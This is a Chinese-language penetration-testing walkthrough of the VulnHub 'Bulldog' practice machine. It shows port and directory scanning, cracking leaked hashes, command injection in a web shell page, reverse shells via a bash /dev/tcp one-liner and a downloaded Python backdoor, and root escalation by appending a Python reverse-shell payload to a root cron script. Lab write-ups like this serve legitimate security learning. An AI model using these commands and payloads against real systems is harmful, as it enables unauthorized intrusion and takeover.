链接:https://download.vulnhub.com/bulldog/
用种子文件下载,直接下载无法下载
- 攻击 IP:192.168.224.139
- 被攻击 IP(虚拟机启动成功自动显示):192.168.43.176
虚拟机安装前言#
- 下载来的虚拟机得用 Virtual Box 打开使用,Vm 下无法连接网络,也可能是我打开姿势不对
- 虚拟机网络使用桥接模式
测试连通性#
端口扫描识别#
nmap -v -sV -T4 192.168.43.176
漏洞查找#
ssh(23)#
- 选择性忽略 - 除了爆破,没啥好搞的
Web(80,8080)#
-
分别访问这个两个端口,发现似乎是一样的网站
-
网站大意就是发现漏洞了,暂停使用
-
先进行目录扫描
dirb http://192.168.43.176
-
扫描出了后台是 admin,robots.txt 文件无意义,还有个 dev/shell 目录
-
后台访问,没有账号密码
-
访问 dev/shell,似乎是个命令执行,但是需要权限
![]()
-
访问 dev~大意就是数据库不用 phpmyadmin 管理,采用一个新的系统来抵御黑客攻击(这不是此地无银三百两嘛...)
-
查看源代码,发现了一些有趣的东西
![]()
-
这是拿来测试用的 hash,但是不知道因为啥没有被删除
-
把这几条 hash 数据一条条拿到 cmd5 查询
![]()
[](https://www.somd5.com/)![]()
- 遇到收费的
换一家
查询... ![]()
- 遇到收费的
-
两个解密结果分别是:
- Back End - [email protected] - bulldog
- Database - [email protected] - bulldoglover
-
尝试直接登录后台,失败
-
把 @ 往后删掉尝试登录成功、
-
不过这个账户在后台并没有什么权限
![]()
-
想到刚才那个命令执行页面~刷新出来了
![]()
-
然而只允许执行他列出来的几个命令
![]()
-
尝试命令注入
![]()
-
注入成功,尝试 nc 连接,直接 500
![]()
-
那我下载一个后门连接总行了吧...攻击机丢一个 python(之前进行端口分析是用 python 写的)后门给他下载
-
(此处也可以使用 echo,
echo 'bash -i >& /dev/tcp/192.168.43.109/1234 0>&1'|bash进行反弹,就不用下面那么麻烦了) -
此处有点头疼...因为我 kali 用的 net 连接模式,相对于被攻击的机子而言处在内网...
-
先将 kali 切成桥接模式,ip 更新为:
192.168.43.109 -
进到 kali 的网站目录,脚本丢进来
![]()
-
切到网站目录后,再用 python 开启 web 服务:
python -m SimpleHTTPServer 80![]()
-
命令执行窗口输入
pwd & wget http://192.168.43.176/a.py -
执行成功
![]()
-
看看文件是否存在
![]()
-
kali 启动监听
nc -nvlp 1234![]()
-
执行
pwd& python a.py -
虽然页面 500,但是 kali 已经反弹成功了
![]()
-
用户属于 sudo 用户组,尝试切换权限失败,尝试直接切换....但需要从命令行窗口运行...而且我也不知道密码
![]()
-
列出文件(包含隐藏文件)
ls -a,发现提示...(这不是废话吗...)![]()
-
切到上级目录,发现一个疑似 admin 的文件夹
![]()
-
列出文件,发现两个提示
![]()
-
进入这个所谓的隐藏目录
![]()
-
先查看 note 内容,大意就是个权限控制器???
-
接着看另一个
![]()
这一坨....
-
(Part1)使用
strings customPermissionApp查看可显示字符
[](https://www.somd5.com/)
-
这里
SUPERultH、imatePASH、SWORDyouH、CANTget如果把 H 全部去掉,可以构成一组有意义的语句:SUPERultimatePASSWORDyouCANTget,分割开来就是 super ultimate password you cant get,大意就是你你得不到最终的超级密码,结合他的提示,以及我框出来的部分可以猜测这个可能是个密码。 -
之前尝试过要从命令行切换权限,尝试将该密码作为 ssh 密码登录
ssh -p23 [email protected]![]()
-
登录成功,尝试切换到 root 权限
![]()
-
至此渗透完成
-
(Part2)刚才那波操作看不懂~那就看看下面的,假设你看到那个文件毫无想法
-
既然要提权,先看看有没有所有者为 root,普通账户有读写权限的文件,可以在里面挂个马啥的,万一刚好有 root 用户执行了,就可以拿到权限
find / -perm -7 ! -type l -ls 2>/dev/null![]()
-
一个 python 文件,打开看看
![]()
-
看上去,这似乎是由别的程序来跑的,看看有哪个程序可能会跑(说实在脑袋里第一反应是定时任务)
grep -rnw '/' -e 'AVApplication.py' 2> /dev/null![]()
`` -
果然是定时任务,还是 root 权限跑的,并且执行周期是每秒一次
-
先挂好 kali,
nc -nvlp 1233 -
只要往里面挂个马就行啦
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.109",1233));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >> AVApplication.py![]()
-
kali 等待一会,就发现脚本已经连上了
``
- 至此,渗透完成
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论